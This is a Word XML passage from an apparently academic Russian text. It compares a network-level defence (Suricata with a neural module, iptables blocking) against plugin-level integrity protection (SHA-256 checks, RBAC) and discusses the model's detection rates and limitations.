          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица 12 – Сравнительная характеристика рубежей защиты</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9776" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3397"/>
        <w:gridCol w:w="3261"/>
        <w:gridCol w:w="3118"/>
      </w:tblGrid>
      <w:tr w:rsidR="002F7745" w:rsidRPr="002F7745" w14:paraId="5040D273" w14:textId="77777777" w:rsidTr="002F7745">
        <w:trPr>
          <w:trHeight w:val="627"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23DF1F99" w14:textId="77777777" w:rsidR="002F7745" w:rsidRPr="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>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Характеристика</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41CC05C7" w14:textId="77777777" w:rsidR="002F7745" w:rsidRPr="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>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Технический рубеж</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B066AED" w14:textId="77777777" w:rsidR="002F7745" w:rsidRPr="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>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Информационный рубеж</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7745" w:rsidRPr="002F7745" w14:paraId="0C4D4338" w14:textId="77777777" w:rsidTr="002F7745">
        <w:trPr>
          <w:trHeight w:val="820"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61D66323"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Средство защиты</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A61BFD"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002F7745">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Suricata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002F7745">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> + нейросетевой модуль</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="178CB6CB"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Механизмы безопасности плагина</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7745" w:rsidRPr="002F7745" w14:paraId="6CE886C0" w14:textId="77777777" w:rsidTr="002F7745">
        <w:trPr>
          <w:trHeight w:val="562"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B187B09"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Объект защиты</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4534CAE1"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Сетевой трафик</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="155805F0"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Файлы модели, доступ к функциям</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7745" w:rsidRPr="002F7745" w14:paraId="7FAC00E0" w14:textId="77777777" w:rsidTr="002F7745">
        <w:trPr>
          <w:trHeight w:val="883"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F86674A"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Метод обнаружения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52355F51"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Поведенческий анализ потоков</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="649693AB"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Контроль хеш-сумм SHA-256, RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7745" w:rsidRPr="002F7745" w14:paraId="349054BA" w14:textId="77777777" w:rsidTr="002F7745">
        <w:trPr>
          <w:trHeight w:val="570"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04AA97F3"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Время обнаружения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F940172"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4 с</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C0846C9"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300 с</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7745" w:rsidRPr="002F7745" w14:paraId="490F3503" w14:textId="77777777" w:rsidTr="002F7745">
        <w:trPr>
          <w:trHeight w:val="551"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="200F36E5"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Время блокировки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02B9A212"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3 с</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="268B4CD4"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Немедленно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7745" w:rsidRPr="002F7745" w14:paraId="26D407F6" w14:textId="77777777" w:rsidTr="002F7745">
        <w:trPr>
          <w:trHeight w:val="828"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67719652"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Тип реагирования</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BA0A6A7"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 xml:space="preserve">Блокировка трафика через </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002F7745">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>iptables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D26067F"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Предупреждение администратора</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7745" w:rsidRPr="002F7745" w14:paraId="4CE8EB51" w14:textId="77777777" w:rsidTr="002F7745">
        <w:trPr>
          <w:trHeight w:val="559"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F422955"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Вероятность обнаружения P₂</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="183867DD" w14:textId="469935A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85</w:t>
            </w:r>
            <w:r w:rsidR="007C1383">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="002F7745">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>7%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46F555C9"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7745" w:rsidRPr="002F7745" w14:paraId="6BF9B448" w14:textId="77777777" w:rsidTr="002F7745">
        <w:trPr>
          <w:trHeight w:val="1034"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E986077" w14:textId="77777777"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Вероятность безотказной работы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56B96722" w14:textId="2BD9320C"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94</w:t>
            </w:r>
            <w:r w:rsidR="007C1383">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="002F7745">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>7%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21B65C25" w14:textId="3018963D" w:rsidR="002F7745" w:rsidRPr="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F7745">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r w:rsidR="007C1383">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="002F7745">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="236C24A1" w14:textId="77777777" w:rsidR="002F7745" w:rsidRPr="00BE7195" w:rsidRDefault="002F7745" w:rsidP="00BE7195">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E16B36C" w14:textId="5639E7AD" w:rsidR="00436D60" w:rsidRDefault="00436D60" w:rsidP="00BE719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r w:rsidR="002F7745" w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Таким образом, предложенная двух рубежная модель защиты охватывает весь жизненный цикл угрозы — от момента её появления в сети до попытки воздействия на сам инструмент обнаружения. Технический рубеж обеспечивает обнаружение и блокировку атак в реальном времени с вероятностью 85</w:t>
      </w:r>
      <w:r w:rsidR="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002F7745" w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7%, информационный рубеж гарантирует что даже при компрометации сетевого периметра сам плагин продолжит корректно функционировать. Реализация обоих рубежей в рамках единого программного комплекса позволяет развернуть комплексную систему защиты без привлечения дополнительных сторонних средств защиты информации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA6554" w14:textId="65F4CFA1" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Вместе с тем следует отметить ряд ограничений предложенной модели. Технический рубеж демонстрирует сниженную эффективность при групповых атаках с распределённой инфраструктурой — прочность системы в данном сценарии составляет 59%, что обусловлено сложностью статистического разграничения распределённого атакующего трафика от легитимного. Информационный рубеж имеет интервал обнаружения 300 секунд, в течение которых модификация модели теоретически может оставаться незамеченной. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03227607" w14:textId="1B4A5C7A" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для повышения эффективности системы в части групповых атак перспективным направлением является дообучение нейросетевой модели на трафике конкретной защищаемой сети, что позволит снизить уровень ложных срабатываний и повысить точность классификации распределённых угроз. Снижение интервала проверки целостности и введение механизма мгновенного уведомления при первом признаке модификации позволит устранить временной разрыв информационного рубежа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095AE28A" w14:textId="77777777" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="00BE7195">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294693EB" w14:textId="77777777" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="00BE7195">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64420DAB" w14:textId="77777777" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="00BE7195">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C872598" w14:textId="77777777" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="00BE7195">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="684F8CA5" w14:textId="77777777" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D05F830" w14:textId="77777777" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="00BE7195">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
